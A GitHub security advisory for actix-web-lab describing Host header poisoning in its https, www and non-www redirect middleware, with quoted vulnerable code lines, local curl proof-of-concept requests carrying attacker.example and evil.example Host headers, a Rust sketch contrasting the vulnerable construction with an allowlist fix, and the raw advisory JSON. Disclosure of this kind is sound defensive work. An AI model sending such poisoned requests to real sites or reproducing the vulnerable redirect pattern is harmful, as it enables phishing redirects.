GHSA-VHJ5-X93P-67JW

Vulnerability from github – Published: 2026-03-11 00:29 – Updated: 2026-03-11 00:29
VLAI
Summary
actix-web-lab: Host header poisoning in redirect middleware can generate attacker-controlled absolute redirects
Details

Summary

actix-web-lab redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, https://{hostname}{path}). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the Location response header, causing open redirect/phishing behavior.

CVE

Assigned CVE ID: CVE-2025-63762

Details

The issue is in redirect middleware paths that construct absolute URLs from req.connection_info():

  1. actix-web-lab/src/redirect_to_https.rs (around lines 119-132)
     - let host = conn_info.host();
     - format!("https://{hostname}{path}")
     - format!("https://{hostname}:{port}{path}")

  2. actix-web-lab/src/redirect_to_www.rs (around lines 30-35)
     - format!("{scheme}://www.{host}{path}")

  3. actix-web-lab/src/redirect_to_non_www.rs (around lines 30-34)
     - format!("{scheme}://{host_no_www}{path}")

Because the host value comes from request connection metadata rather than from server configuration, an untrusted Host header controls the authority part of the redirect target whenever deployment-side host validation is missing. Note that actix-web's ConnectionInfo::host() prefers forwarding headers (Forwarded, X-Forwarded-Host) over Host, so a reverse proxy in front of the app only closes the hole if it also overwrites or strips those headers rather than relaying client-supplied values.

PoC

Environment used for validation:

  • Local minimal Actix apps using actix-web-lab middleware
  • RedirectHttps: http://127.0.0.1:18080
  • redirect_to_www: http://127.0.0.1:18081
  • redirect_to_non_www: http://127.0.0.1:18082

Reproduction (RedirectHttps):

curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test

Additional verification:

curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def

Reproduction (redirect_to_www):

curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello

Reproduction (redirect_to_non_www):

curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path

Impact

This is a Host header poisoning / open redirect issue (CWE-601). Because the middleware answers with a 307 to an attacker-chosen host, a victim who follows a crafted link to the legitimate origin is sent to an attacker-controlled domain, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (allowlisting at the proxy or in the app) is impacted. The advisory record below lists versions <= 0.25.0 as affected and 0.26.0 as the fixed release.
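The construction in the Details section and the allowlisting the Impact section calls for, as an added example that is not actix-web-lab's code: a dependency-free model of the three redirect constructions on plain strings. redirect_to_https_vulnerable reproduces the reported behaviour (the Host header lands in Location, port stripped as in the evil.example:9999 case). HostAllowlist and the hardened redirect_to_https / redirect_to_www / redirect_to_non_www functions are hypothetical names; the Redirect enum, the https_port parameter, the allowlist contents and the simplified www/non-www semantics (redirect unless the host already has, or already lacks, the www. prefix) are assumptions chosen for illustration, not the crate's API.

```rust
// Added example, not actix-web-lab code. Models the advisory's redirect
// constructions on plain strings: the vulnerable form interpolates the
// request Host, the hardened form only ever emits an allowlisted string.
use std::collections::HashSet;

/// Outcome of a redirect decision (assumed type, not the crate's).
#[derive(Debug, PartialEq)]
enum Redirect {
    /// Send a 307 with this Location.
    Location(String),
    /// Request is already in canonical form; let it through.
    PassThrough,
    /// Host is not on the deployment allowlist: answer 400, never redirect.
    RejectHost,
}

/// Split a Host header value into (hostname, port). Bracketed IPv6
/// literals such as "[::1]:8080" are handled; bare IPv6 is not valid Host.
fn split_host_port(host: &str) -> (&str, Option<&str>) {
    if host.starts_with('[') {
        if let Some(end) = host.find(']') {
            return (&host[..=end], host[end + 1..].strip_prefix(':'));
        }
    }
    match host.rfind(':') {
        Some(i) => (&host[..i], Some(&host[i + 1..])),
        None => (host, None),
    }
}

/// Vulnerable pattern from the advisory: whatever the client sent as Host
/// is written into an absolute Location, so "Host: attacker.example"
/// yields "https://attacker.example/test".
fn redirect_to_https_vulnerable(host: &str, path: &str) -> String {
    let (hostname, _port) = split_host_port(host);
    format!("https://{hostname}{path}")
}

/// Hardened form: a fixed, lower-cased set of hostnames this deployment
/// answers for (hypothetical helper; contents are an assumption).
struct HostAllowlist {
    hosts: HashSet<String>,
}

impl HostAllowlist {
    fn new(hosts: &[&str]) -> Self {
        Self { hosts: hosts.iter().map(|h| h.to_ascii_lowercase()).collect() }
    }

    /// Canonical hostname for a request Host value, or None if it is not
    /// allowlisted. The port must be numeric but is otherwise ignored. The
    /// returned &str is the allowlist entry, never the request's bytes.
    fn canonical(&self, host_header: &str) -> Option<&str> {
        let (hostname, port) = split_host_port(host_header.trim());
        if let Some(p) = port {
            if p.parse::<u16>().is_err() {
                return None;
            }
        }
        let name = hostname.to_ascii_lowercase();
        // Reject anything that is not a bare host token (no path, userinfo, etc.).
        if name.is_empty()
            || name.contains(|c: char| matches!(c, '/' | '\\' | '@' | '?' | '#') || c.is_whitespace())
        {
            return None;
        }
        self.hosts.get(&name).map(String::as_str)
    }
}

/// Hardened https redirect; https_port is the configured HTTPS port.
fn redirect_to_https(allow: &HostAllowlist, host: &str, path: &str, https_port: u16) -> Redirect {
    match allow.canonical(host) {
        None => Redirect::RejectHost,
        Some(hostname) if https_port == 443 => Redirect::Location(format!("https://{hostname}{path}")),
        Some(hostname) => Redirect::Location(format!("https://{hostname}:{https_port}{path}")),
    }
}

/// Hardened www redirect (simplified semantics, an assumption).
fn redirect_to_www(allow: &HostAllowlist, scheme: &str, host: &str, path: &str) -> Redirect {
    match allow.canonical(host) {
        None => Redirect::RejectHost,
        Some(h) if h.starts_with("www.") => Redirect::PassThrough,
        Some(h) => Redirect::Location(format!("{scheme}://www.{h}{path}")),
    }
}

/// Hardened non-www redirect (simplified semantics, an assumption).
fn redirect_to_non_www(allow: &HostAllowlist, scheme: &str, host: &str, path: &str) -> Redirect {
    match allow.canonical(host) {
        None => Redirect::RejectHost,
        Some(h) => match h.strip_prefix("www.") {
            Some(bare) => Redirect::Location(format!("{scheme}://{bare}{path}")),
            None => Redirect::PassThrough,
        },
    }
}

fn main() {
    let allow = HostAllowlist::new(&["example.com", "www.example.com"]);
    println!("vulnerable: {}", redirect_to_https_vulnerable("attacker.example", "/test"));
    println!("hardened:   {:?}", redirect_to_https(&allow, "attacker.example", "/test", 443));
    println!("hardened:   {:?}", redirect_to_https(&allow, "Example.COM:8080", "/abc/def", 443));
    println!("hardened:   {:?}", redirect_to_www(&allow, "http", "example.com", "/hello"));
    println!("hardened:   {:?}", redirect_to_non_www(&allow, "http", "www.attacker.example", "/path"));
}
```

The property worth keeping from this sketch is that the bytes placed in Location come from the allowlist entry, not from the request, and that an unrecognised host produces a 400 rather than a "best effort" redirect. The path is kept as-is because the authority is now fixed; if the app runs behind a proxy, the same check has to cover whatever forwarded host headers the proxy relays.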


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.25.0"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "actix-web-lab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-601"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-11T00:29:17Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n`actix-web-lab` redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, `https://{hostname}{path}`). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the `Location` response header, causing open redirect/phishing behavior.\n\n### CVE\nAssigned CVE ID:  CVE-2025-63762\n\n### Details\nThe issue is in redirect middleware paths that construct absolute URLs from `req.connection_info()`:\n\n1. `actix-web-lab/src/redirect_to_https.rs` (around lines 119-132)\n   - `let host = conn_info.host();`\n   - `format!(\"https://{hostname}{path}\")`\n   - `format!(\"https://{hostname}:{port}{path}\")`\n\n2. `actix-web-lab/src/redirect_to_www.rs` (around lines 30-35)\n   - `format!(\"{scheme}://www.{host}{path}\")`\n\n3. `actix-web-lab/src/redirect_to_non_www.rs` (around lines 30-34)\n   - `format!(\"{scheme}://{host_no_www}{path}\")`\n\nBecause host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.\n\n### PoC\nEnvironment used for validation:\n- Local minimal Actix apps using `actix-web-lab` middleware\n- RedirectHttps: `http://127.0.0.1:18080`\n- redirect_to_www: `http://127.0.0.1:18081`\n- redirect_to_non_www: `http://127.0.0.1:18082`\n\nReproduction (RedirectHttps):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18080/test\" -H \"Host: attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: https://attacker.example/test\n```\n\nAdditional verification:\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18080/abc/def\" -H \"Host: evil.example:9999\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: https://evil.example/abc/def\n```\n\nReproduction (redirect_to_www):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18081/hello\" -H \"Host: attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: http://www.attacker.example/hello\n```\n\nReproduction (redirect_to_non_www):\n```bash\ncurl.exe -i -s \"http://127.0.0.1:18082/path\" -H \"Host: www.attacker.example\"\n```\n\nObserved response:\n```http\nHTTP/1.1 307 Temporary Redirect\nlocation: http://attacker.example/path\n```\n\n### Impact\nThis is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.",
  "id": "GHSA-vhj5-x93p-67jw",
  "modified": "2026-03-11T00:29:17Z",
  "published": "2026-03-11T00:29:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/robjtede/actix-web-lab/security/advisories/GHSA-vhj5-x93p-67jw"
    },
    {
      "type": "WEB",
      "url": "https://github.com/robjtede/actix-web-lab/pull/292"
    },
    {
      "type": "WEB",
      "url": "https://github.com/robjtede/actix-web-lab/commit/142c28b82eb59b67445a859a2a9b75e01a9964ee"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/robjtede/actix-web-lab"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "actix-web-lab has host header poisoning in redirect middleware can generate attacker-controlled absolute redirects"
}

